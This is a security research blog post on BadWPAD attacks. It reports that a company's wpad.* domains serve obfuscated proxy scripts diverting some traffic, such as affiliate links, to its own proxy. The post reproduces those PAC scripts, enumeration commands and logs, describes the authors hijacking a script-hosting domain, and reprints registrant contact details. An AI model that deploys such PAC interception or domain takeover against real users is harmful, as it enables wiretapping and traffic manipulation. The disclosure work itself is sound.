BadWPAD, DNS suffix and wpad.pl / wpadblocking.com case

blog.redteam.pl, 5 years ago
Quoting the resolv.conf (Linux) man page for the “search” option: “Search list for host-name lookup. The search list is usually determined from the local domain name; by default, it contains only the local domain name. This may be changed by listing the desired domain search path following the search keyword with spaces or tabs separating the names. Resolver queries having less than ndots dots (default is 1) in them will be attempted using each component of the search path in turn until a match is found. For environments with multiple subdomains please read options ndots:n below to avoid man-in-the-middle attacks and unnecessary traffic for the root-dns-servers. Note that this process may be slow and will generate a lot of network traffic if the servers for the listed domains are not local, and that queries will time out if no server is available for one of the domains”. In short, this means that when we use “search pl” and visit http://redteam/, the resolver will first try http://redteam.pl/. This option is the same as “dns-search pl” in /etc/network/interfaces (Linux). In Windows this option is called the DNS suffix and works identically. Such DNS suffix configuration is retrieved by the client from DHCP, but it can also be (manually) modified on each system.


Windows (i.a. Windows 10) commonly has the Web Proxy Auto-Discovery Protocol (WPAD) enabled by default. Quoting Wikipedia, this is a: “Method used by clients to locate the URL of a configuration file using DHCP and/or DNS discovery methods. Once detection and download of the configuration file is complete, it can be executed to determine the proxy for a specified URL”.



The search for WPAD is done with DNS queries and also over the LLMNR and NBNS protocols:


Which we can find in Wireshark using the display filter:
nbns.name == "WPAD<00>" || dns.qry.name == "wpad"

BadWPAD is an attack in which a malicious actor, usually but not only in the LAN, responds to WPAD requests. Windows systems will also search for WPAD using DNS queries based on the DNS suffix, e.g. for the “pl” DNS suffix it will be wpad.pl; in this case, if such a hostname (wpad.pl) is found, Windows will try to fetch the WPAD configuration (/wpad.dat) from http://wpad.pl/wpad.dat.


GET /wpad.dat HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: WinHttp-Autoproxy-Service/5.1
Host: wpad.pl

HTTP/1.1 200 OK
Server: openresty
Date: Tue, 30 Apr 2019 11:32:47 GMT
Content-Type: application/x-ns-proxy-autoconfig
Content-Length: 505
Last-Modified: Mon, 29 Apr 2019 10:31:44 GMT
Connection: keep-alive
ETag: "5cc6d290-1f9"
Expires: Thu, 09 May 2019 14:44:16 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

// WPADblock - monitoring and protecting leaking WPAD.* traffic since 2007.
// Your computer SHOULD NOT be downloading this file. Please fix your network configuration.
// Read more at https://www.wpadblock.com

function FindProxyForURL(url, host) {
    // use proxy for wpadblocking.com and wpadleaking.com domains
    if(/http:\/\/([.wpad]{4})?([bloc]|[lea])+king\.([.a-z]{1,6}|com)/.test(url)) { return "PROXY 144.76.184.43:80; DIRECT"; }

    // use direct for everything else
    return "DIRECT";
}

If the DNS suffix is set to awesome.redteam.pl, Windows requests the wpad.dat file from WPAD servers until a server responds with the file. It tries different URLs within the domain:
1. http://wpad.awesome.redteam.pl/wpad.dat
2. http://wpad.redteam.pl/wpad.dat
3. http://wpad.pl/wpad.dat

Other TLDs are also important, because for the DNS suffix um.warszawa.pl (address of the official website of the capital of Poland) it will be:
1. http://wpad.um.warszawa.pl/wpad.dat
2. http://wpad.warszawa.pl/wpad.dat
3. http://wpad.pl/wpad.dat

If successful, the browser will access the Internet via the proxy from wpad.dat.
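As an added illustration (not code from the post or from WPADblock), the following Node.js snippet reproduces the hostname devolution described above and flags the candidates an organisation cannot answer from its own DNS. The DNS table inside it is constructed, and it assumes, as the post shows, that the client walks down to the single-label TLD.

```javascript
// Added example (not code from the post): derive the wpad hostnames a Windows
// client tries for a given DNS suffix, in the order described above, and show
// which of them lie outside the zone an organisation actually controls.

// Candidate hostnames: "wpad." + the suffix, then "wpad." + each shorter suffix
// obtained by dropping the leftmost label, down to the single-label TLD.
function wpadCandidates(dnsSuffix) {
  const labels = dnsSuffix.toLowerCase().replace(/\.$/, "").split(".").filter(Boolean);
  return labels.map((_, i) => "wpad." + labels.slice(i).join("."));
}

function wpadUrls(dnsSuffix) {
  return wpadCandidates(dnsSuffix).map((h) => `http://${h}/wpad.dat`);
}

// True when host equals the zone or is a subdomain of it.
function inZone(host, zone) {
  return host === zone || host.endsWith("." + zone);
}

// Candidates whose parent domain is above the zone the administrator controls;
// an answer for these comes from somebody else's DNS.
function externalCandidates(dnsSuffix, controlledZone) {
  const zone = controlledZone.toLowerCase();
  return wpadCandidates(dnsSuffix).filter((h) => !inZone(h, zone));
}

// Which candidate the client ends up using: the first one that resolves.
// `resolves` is a lookup over a constructed DNS table (no network access).
function chosenWpadHost(dnsSuffix, resolves) {
  return wpadCandidates(dnsSuffix).find((h) => resolves(h)) || null;
}

// Constructed resolution table mirroring the records quoted in the post:
// the city office has no wpad.um.warszawa.pl, while wpad.warszawa.pl and
// wpad.pl both resolve to 144.76.184.43.
const SAMPLE_DNS = {
  "wpad.warszawa.pl": "144.76.184.43",
  "wpad.pl": "144.76.184.43",
};
const sampleResolves = (host) => Object.prototype.hasOwnProperty.call(SAMPLE_DNS, host);

if (typeof require !== "undefined" && require.main === module) {
  console.log(wpadUrls("um.warszawa.pl"));
  console.log("outside own zone:", externalCandidates("um.warszawa.pl", "um.warszawa.pl"));
  console.log("client would use:", chosenWpadHost("um.warszawa.pl", sampleResolves));
}
```

Any hostname listed by externalCandidates is one that should be checked with the organisation's own resolver, because a record there is answered by a zone the organisation does not control.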

Let’s check how many WPAD domains are registered under Polish TLDs:

wpad.pl has address 144.76.184.43
wpad.com.pl has address 144.76.184.43
wpad.biz.pl has address 144.76.184.43
wpad.edu.pl has address 144.76.184.43
wpad.info.pl has address 144.76.184.43
wpad.net.pl has address 144.76.184.43
wpad.org.pl has address 144.76.184.43
wpad.bydgoszcz.pl has address 144.76.184.43
wpad.katowice.pl has address 144.76.184.43
wpad.olsztyn.pl has address 144.76.184.43
wpad.opole.pl has address 144.76.184.43
wpad.radom.pl has address 144.76.184.43
wpad.rzeszow.pl has address 144.76.184.43
wpad.slask.pl has address 144.76.184.43
wpad.szczecin.pl has address 144.76.184.43
wpad.warszawa.pl has address 144.76.184.43
wpad.waw.pl has address 144.76.184.43
wpad.zgora.pl has address 144.76.184.43

All of these popular Polish TLDs resolve to a single IP address, 144.76.184.43, which is located in Germany (AS24940 Hetzner Online GmbH).

This means that if someone uses the DNS suffix warszawa.pl and looks for WPAD, Windows will find wpad.warszawa.pl and load the WPAD config from http://wpad.warszawa.pl/wpad.dat. There is also the important problem mentioned before: if e.g. the city office of Warsaw uses the DNS suffix um.warszawa.pl and there is no wpad.um.warszawa.pl, then it will use wpad.warszawa.pl, which points to the same IP address as wpad.pl.

Let’s check whether the above TLDs serve WPAD scripts (wpad.dat):

$ for wpad in $(echo wpad.pl wpad.com.pl wpad.biz.pl wpad.edu.pl wpad.info.pl wpad.net.pl wpad.org.pl wpad.bydgoszcz.pl wpad.katowice.pl wpad.olsztyn.pl wpad.opole.pl wpad.radom.pl wpad.rzeszow.pl wpad.slask.pl wpad.szczecin.pl wpad.warszawa.pl wpad.waw.pl wpad.zgora.pl);do echo $wpad && curl -s -i $wpad/wpad.dat | grep Content-Type;done
wpad.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.com.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.biz.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.edu.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.info.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.net.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.org.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.bydgoszcz.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.katowice.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.olsztyn.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.opole.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.radom.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.rzeszow.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.slask.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.szczecin.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.warszawa.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.waw.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.zgora.pl
Content-Type: application/x-ns-proxy-autoconfig

Unfortunately yes, but at this moment (28 Apr 2019 10:28:54 GMT) it is not malicious:

$ curl -i http://wpad.pl/wpad.dat
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 28 Apr 2019 10:28:54 GMT
Content-Type: application/x-ns-proxy-autoconfig
Content-Length: 488
Last-Modified: Mon, 18 Mar 2019 19:51:20 GMT
Connection: keep-alive
ETag: "5c8ff6b8-1e8"
Expires: Sun, 05 May 2019 10:28:54 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

// WPADblock - monitoring and protecting leaking WPAD.* traffic since 2007.
// Your computer SHOULD NOT be downloading this file. Please fix your network configuration.
// Read more at https://www.wpadblock.com

function FindProxyForURL(url, host) {
    // use proxy for wpadblocking.com and wpadleaking.com domains
    if(/http:\/\/[.wpad]{4}([block]|[leak])+ing.com/.test(url)) { return "PROXY 144.76.184.43:80; DIRECT"; }
    // use direct for everything else
    return "DIRECT";
}

But this gives no guarantee that it will not serve malicious content in the future, change the content for a short period of time, or serve it e.g. only to clients of a single ISP, CIDR etc. If a malicious actor knows that e.g. some ISP is using the search domain “pl”, then they can serve malicious content just for that ASN, and everyone else will get a non-malicious script. This approach minimizes the risk of such a threat being detected.

$ curl -i http://wpad.pl
HTTP/1.1 302 Moved Temporarily
Server: openresty
Date: Sun, 28 Apr 2019 10:29:22 GMT
Content-Type: text/html
Content-Length: 158
Connection: keep-alive
Location: https://www.booking.com/index.html?aid=1300873

<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>openresty</center>
</body>
</html>

Currently the main domains such as wpad.pl redirect to the Booking.com affiliate program, not even to the website with information about this project [https://www.wpadblock.com/]. Quoting the WPADblock project: “We've been registering wpad.* domains since 2007 to prevent malicious use. These domains pose several security threats, ranging from simple MITM attacks, ending with possible remote code execution. Please refer to the links provided below for further information. We currently do not disclose information on how frequently these domains are queried. We do however gather statistical information, that can be shared for the purposes of security research at any time”. From a victim’s perspective, information about the project can only be found in the wpad.dat script, i.e. by analysing the details of the BadWPAD attack.


The proxy from the above wpad.dat is set to IP address 144.76.184.43:80 and also redirects to booking.com (and with high probability logs all requests):

GET http://detectportal.firefox.com/success.txt HTTP/1.1
Host: detectportal.firefox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
Connection: close

HTTP/1.1 302 Moved Temporarily
Server: openresty
Date: Wed, 01 May 2019 16:39:24 GMT
Content-Type: text/html
Content-Length: 158
Connection: close
Location: https://www.booking.com/index.html?aid=1300873
Allow: GET, POST, HEAD

<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>openresty</center>
</body>
</html>

If this were replaced by a malicious WPAD script, it could lead to a massive infection of, i.a., Polish computers, but not only those, because in fact this IP is pointed to by dozens of “wpad” TLDs; based on information from PassiveTotal these include wpad.be, wpad.blog, wpad.cam, wpad.cat, wpad.cc, wpad.center, wpad.com.ar, wpad.com.co, wpad.com.es, wpad.com.tw, wpad.com.ua, wpad.computer, wpad.cz, wpad.direct, wpad.domains, wpad.ee, wpad.es, wpad.eu.org, wpad.gr, wpad.group, wpad.hr, wpad.im, wpad.info, wpad.it, wpad.kiev.ua, wpad.live, wpad.ltd, wpad.lv, wpad.me.uk, wpad.msk.ru, wpad.name, wpad.net.ar, wpad.net.br, wpad.net.cn, wpad.network, wpad.nom.es, wpad.org.cn, wpad.org.es, wpad.plus, wpad.pro, wpad.run, wpad.sk, wpad.ski, wpad.systems, wpad.team, wpad.tv, wpad.tw, wpad.vip, wpad.ws, wpad.xxx and wpad.zone.

Currently the following TLDs from the IANA list [https://data.iana.org/TLD/tlds-alpha-by-domain.txt] point to the IP address of this project:

wpad.cc has address 144.76.184.43
wpad.cz has address 144.76.184.43
wpad.ee has address 144.76.184.43
wpad.gr has address 144.76.184.43
wpad.hr has address 144.76.184.43
wpad.im has address 144.76.184.43
wpad.it has address 144.76.184.43
wpad.lv has address 144.76.184.43
wpad.pl has address 144.76.184.43
wpad.sk has address 144.76.184.43
wpad.tv has address 144.76.184.43
wpad.tw has address 144.76.184.43
wpad.ws has address 144.76.184.43

wpad.cat has address 144.76.184.43
wpad.computer has address 144.76.184.43
wpad.direct has address 144.76.184.43
wpad.domains has address 144.76.184.43
wpad.group has address 144.76.184.43
wpad.info has address 144.76.184.43
wpad.live has address 144.76.184.43
wpad.ltd has address 144.76.184.43
wpad.name has address 144.76.184.43
wpad.network has address 144.76.184.43
wpad.plus has address 144.76.184.43
wpad.pro has address 144.76.184.43
wpad.systems has address 144.76.184.43
wpad.vip has address 144.76.184.43
wpad.xxx has address 144.76.184.43
wpad.zone has address 144.76.184.43

Most of these domains use CloudFlare, but some use:

ns1.wpadblock.com has address 144.76.184.43
ns2.wpadblock.com has address 79.98.145.34
ns3.wpadblock.com has address 193.70.13.218

ns2.wpadblock.com (fns1.42.pl) and ns3.wpadblock.com (fns2.42.pl) are IP addresses from FreeDNS::42 [https://freedns.42.pl].

Most WHOIS records for the above domains are privacy protected, hiding the information about who owns each domain, but some are not protected, for example the following:

wpad.cam
Registrant Organization: QRMedia Sp. z o. o.

wpad.cat
Billing Name: Tomasz Koperski
Billing Organization: QRMedia Sp. z o. o.
Billing Street: Wernyhory 1
Billing City: Warsaw
Billing State/Province: Województwo Mazowieckie
Billing Postal Code: 02-727
Billing Country: PL
Billing Phone: +48.880000056
Billing Phone Ext:
Billing Fax:
Billing Fax Ext:
Billing Email: domains@qrmedia.pl

wpad.cz
org: QRMedia Sp. z o. o.
name: Tomasz Koperski
address: Pulawska 182
address: Warszawa
address: 02670
address: PL

wpad.hr
Registrant Name: QRMEDIA SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ
Registrant Street: Puławska 182
Registrant City: Warszawa
Registrant State/Province: PL
Registrant Postal Code: 02-670

Please note that all the above information is public and can be obtained free of charge from open-source and purpose-built WHOIS databases. The domains are registered by a Polish company, not a private individual, so under GDPR we are allowed to publish it.

While writing this article, we were able to take over (register at 2019-04-29T06:32:15.0Z) the domain wpadleaking.com, which was used in <script> tags on the project website at www.wpadblock.com. We were able to control users visiting the project website and redirect them, i.a., to this article. This was identified by the project owner within just a few hours, and later the domain was changed in the website HTML code:

$ curl -s www.wpadblock.com | grep -B1 vulnerable.js
<!-- Good catch RED TEAM, switched to different domain -->
<script src="http://wpadblocking.com/vulnerable.js"></script>

$ whois wpadblocking.com | grep ^Creation
Creation Date: 2019-04-29T14:01:51.00Z

In the meantime we got some visits:

103.123.84.107 - - [01/May/2019:07:41:55 +0200] "GET / HTTP/1.1" 500 3513 "http://wpadleaking.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
103.123.84.119 - - [01/May/2019:07:41:54 +0200] "GET / HTTP/1.1" 500 3513 "http://wpadleaking.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
103.123.84.90 - - [01/May/2019:07:41:56 +0200] "GET / HTTP/1.1" 500 3513 "http://wpadleaking.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
103.123.84.99 - - [01/May/2019:07:41:55 +0200] "GET / HTTP/1.1" 500 3513 "http://wpadleaking.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
106.12.101.74 - - [29/Apr/2019:15:29:27 +0200] "GET / HTTP/1.1" 302 3644 "http://wpad.name/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
167.114.232.244 - - [01/May/2019:00:45:07 +0200] "GET / HTTP/1.1" 302 4217 "http://www.wpadleaking.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
66.249.64.62 - - [29/Apr/2019:13:59:59 +0200] "GET / HTTP/1.1" 302 4217 "http://wpad.info/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
78.11.113.74 - - [29/Apr/2019:14:12:27 +0200] "GET / HTTP/2.0" 302 60 "http://wpad.co/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36"

This shows that there is in fact user activity. After they realised our interest in this project they also immediately stopped serving the WPAD configuration (wpad.dat), but there are copies made by the Wayback Machine web.archive.org [http://web.archive.org/web/20171225164836/http://wpad.pl/wpad.dat, http://web.archive.org/web/20171225164836if_/http://wpad.pl/wpad.dat], which are more interesting because they contain other, possibly malicious scripts:

// WPADblock.com project - monitoring and protecting leaking WPAD.* traffic since 2007. Read more at www.wpadblock.com
//
// Your computer SHOULD NOT be downloading this file. Please fix your network configuration.
// Read more on WPAD security: http://www.trendmicro.co.uk/media/misc/wp-badwpad.pdf

function FindProxyForURL(url, host) {
    // LOCAL: research and stats. Regular expression patterns for testsite.local
    if ((isInNet(myIpAddress(), "172.16.44.0", "255.255.255.0") && ((( shExpMatch(url, "*test*te.loc*/?ecur?/*") && !shExpMatch(url, "*1?222?1*") ) || ( shExpMatch(url, "*testsi*.lo?al/s*e/*txt") && !shExpMatch(url, "*2*88*") && (shExpMatch(url, "*3?13*")))))) || (shExpMatch(url, "*p:/*b?o*g.*/*") && shExpMatch(url, "*tt*oo*in*"))) { return "PROXY 144.76.184.43:80"; }

    // REMOTE: all outside world traffic: DIRECT
    return "DIRECT";
}

/*
FILE ARCHIVED ON 16:48:36 Dec 25, 2017 AND RETRIEVED FROM THE
INTERNET ARCHIVE ON 22:13:02 May 01, 2019.
JAVASCRIPT APPENDED BY WAYBACK MACHINE, COPYRIGHT INTERNET ARCHIVE.

ALL OTHER CONTENT MAY ALSO BE PROTECTED BY COPYRIGHT (17 U.S.C.
SECTION 108(a)(3)).
*/

After a little beautifying and colouring for better readability and understanding:

function FindProxyForURL(url, host) {
    // LOCAL: research and stats. Regular expression patterns for testsite.local
    if ((isInNet(myIpAddress(), "172.16.44.0", "255.255.255.0") &&
         (((shExpMatch(url, "*test*te.loc*/?ecur?/*") &&
            !shExpMatch(url, "*1?222?1*")) ||
           (shExpMatch(url, "*testsi*.lo?al/s*e/*txt") &&
            !shExpMatch(url, "*2*88*") && (shExpMatch(url, "*3?13*")))))) ||
        (shExpMatch(url, "*p:/*b?o*g.*/*") && shExpMatch(url, "*tt*oo*in*"))) {
        return "PROXY 144.76.184.43:80";
    }
    // REMOTE: all outside world traffic: DIRECT
    return "DIRECT";
}

An older copy of this script, from 2016, contains even more conditions [http://web.archive.org/web/20160316084421/http://wpad.pl/wpad.dat, http://web.archive.org/web/20160316084421if_/http://wpad.pl/wpad.dat]:

// WpadBlock.com project
// testing regular expressions
function FindProxyForURL(url, host) {
    if( ( shExpMatch(url, "*//s?clic??a*pres?.c*/e/*") && !shExpMatch(url, "*aQNVZ?AU*") ) || ( shExpMatch(url, "*:/?e?or?.?w/*") && !shExpMatch(url, "*OZ?2?*") ) || ( shExpMatch(url, "*t*p:*sh*u*.t*te*eg*st*r") && !shExpMatch(url, "*new*") && !shExpMatch(url, "*ac*ru*s*") ) || ( shExpMatch(url, "h?t*/*w.b?*k?ng.c*m/*aid*") && !shExpMatch(url, "*3646?2*") && !shExpMatch(url, "*/aclk*") && !shExpMatch(url, "*noredir*") && !shExpMatch(url, "*gclid*") ) || ( ( shExpMatch(url, "*ttp:/*w?pl*s5?0.*/") || shExpMatch(url, "ht*w?pl*s5?0.*/*id=*") ) ) || ( shExpMatch(url, "*w?ce?*o.p?/C*ent*js*bun*e/b*/js*") ) || ( shExpMatch(url, "*t*ff?l*.be*-*-ho*.c*/p*ss*/*.as*bta*a_*") && !shExpMatch(url, "*a_7?59?b*") ) || ( shExpMatch(url, "*.?rs?c?m/??/") || shExpMatch(url, "*.?rs?d??we?3/") || shExpMatch(url, "*.?rs?c?m/we?3/") || (shExpMatch(url, "*.hr??*hot*?do*off*") && !shExpMatch(url, "*10?35?2?39*")) ) || ( shExpMatch(url, "*tt*/g?.s*le?m*i?.p?/*_*=*") && !shExpMatch(url, "*d=1?90*") ) || ( shExpMatch(url, "*p://af?.?pti*ar?.c??/*") && !shExpMatch(url, "*8?67*") ) || ( shExpMatch(url, "*p:*/w*.co?p*ial?a*ann?r*p*ef*") && !shExpMatch(url, "*75?6*6*") ) ) return "PROXY 144.76.184.43:80";
    return "DIRECT";
}

/*
FILE ARCHIVED ON 08:44:21 Mar 16, 2016 AND RETRIEVED FROM THE
INTERNET ARCHIVE ON 22:17:02 May 01, 2019.
JAVASCRIPT APPENDED BY WAYBACK MACHINE, COPYRIGHT INTERNET ARCHIVE.

ALL OTHER CONTENT MAY ALSO BE PROTECTED BY COPYRIGHT (17 U.S.C.
SECTION 108(a)(3)).
*/

The same script is present in the copy from 07 Jul 2015 [http://web.archive.org/web/20150707025003/http://wpad.it:80/wpad.dat], so it was served for a long time.

function FindProxyForURL(url, host) {
    if ((shExpMatch(url, "*//s?clic??a*pres?.c*/e/*") &&
         !shExpMatch(url, "*aQNVZ?AU*")) ||
        (shExpMatch(url, "*:/?e?or?.?w/*") && !shExpMatch(url, "*OZ?2?*")) ||
        (shExpMatch(url, "*t*p:*sh*u*.t*te*eg*st*r") &&
         !shExpMatch(url, "*new*") && !shExpMatch(url, "*ac*ru*s*")) ||
        (shExpMatch(url, "h?t*/*w.b?*k?ng.c*m/*aid*") &&
         !shExpMatch(url, "*3646?2*") && !shExpMatch(url, "*/aclk*") &&
         !shExpMatch(url, "*noredir*") && !shExpMatch(url, "*gclid*")) ||
        ((shExpMatch(url, "*ttp:/*w?pl*s5?0.*/") ||
          shExpMatch(url, "ht*w?pl*s5?0.*/*id=*"))) ||
        (shExpMatch(url, "*w?ce?*o.p?/C*ent*js*bun*e/b*/js*")) ||
        (shExpMatch(url, "*t*ff?l*.be*-*-ho*.c*/p*ss*/*.as*bta*a_*") &&
         !shExpMatch(url, "*a_7?59?b*")) ||
        (shExpMatch(url, "*.?rs?c?m/??/") || shExpMatch(url, "*.?rs?d??we?3/") ||
         shExpMatch(url, "*.?rs?c?m/we?3/") ||
         (shExpMatch(url, "*.hr??*hot*?do*off*") &&
          !shExpMatch(url, "*10?35?2?39*"))) ||
        (shExpMatch(url, "*tt*/g?.s*le?m*i?.p?/*_*=*") &&
         !shExpMatch(url, "*d=1?90*")) ||
        (shExpMatch(url, "*p://af?.?pti*ar?.c??/*") &&
         !shExpMatch(url, "*8?67*")) ||
        (shExpMatch(url, "*p:*/w*.co?p*ial?a*ann?r*p*ef*") &&
         !shExpMatch(url, "*75?6*6*")))
        return "PROXY 144.76.184.43:80";
    return "DIRECT";
}

This actually provides proof of possible malicious behaviour, for example the following pattern:

h?t*/*w.b?*k?ng.c*m/*aid*

matches the redirect to the Booking.com affiliate program which was used a few days ago:

https://www.booking.com/index.html?aid=1300873

In my opinion this obfuscation was made to hide the malicious behaviour of the WPAD script; I don’t see any other reason in this case. First of all, this company registers such domains and describes this approach as related to countering BadWPAD attacks, and secondly it serves a WPAD script which does not just return DIRECT but also catches some parts of the traffic by redirecting them to their own proxy. All of this doesn’t inspire confidence, and it looks like it may hide malicious behaviour under a noble goal. Another reason to believe that this could be malicious is that shortly after we started researching this case they removed the wpad.dat scripts. Also, the domain wpad.pl started redirecting to the project homepage:

$ curl -I http://wpad.pl
HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Wed, 01 May 2019 23:58:38 GMT
Content-Type: text/html
Content-Length: 182
Connection: keep-alive
Location: http://www.wpadblock.com

Whereas a few hours before it redirected to the Booking.com affiliate program:

HTTP/1.1 302 Moved Temporarily
Server: openresty
Date: Wed, 01 May 2019 16:39:24 GMT
Content-Type: text/html
Content-Length: 158
Connection: close
Location: https://www.booking.com/index.html?aid=1300873

Isn’t this all suspicious?

The company QRMedia Sp. z o. o. which registered these domains really exists in Poland (KRS 0000386027 [https://ekrs.ms.gov.pl/web/wyszukiwarka-krs], NIP 1132838203), and its website https://www.qrmedia.pl redirects to https://www.dnsoverride.com, which is a DNS-related product. This is interesting because the cost of all these domains is not low and the project is not even used for any advertising. So the question is whether the collected data is used for any malicious or unethical purposes. We have only a limited amount of data, but the above-mentioned patterns prove that it could be used at least to make money on affiliate programs, which also explains why it was profitable to pay for all of these domains for many years (for example wpad.pl has been registered since 2008). Anyway, such projects, which in fact lead to a man-in-the-middle (MITM) attack, if run at all, should be run only by authorized CERT teams (like CERT Polska in the case of wpad.pl), which we can trust, not by a (small, not even infosec) private company. Please note that this is not just about owning such domains; what is important is serving a WPAD script with a configuration which leads to at least proxying some parts of the traffic over third-party servers for wiretapping and, highly likely, modifying traffic (like replacing affiliate program IDs with their own etc). An important point to note is that the served WPAD scripts are intentionally obfuscated. Please keep in mind that this server can also simply be hacked at any time, or the domain wpadblock.com can be taken over etc., and then this infrastructure can start serving malicious content too, which can lead to a massive infection. All of this proves that such domains should be sinkholed as soon as possible by CERT teams that have jurisdiction over these resources (TLDs, IP address etc).
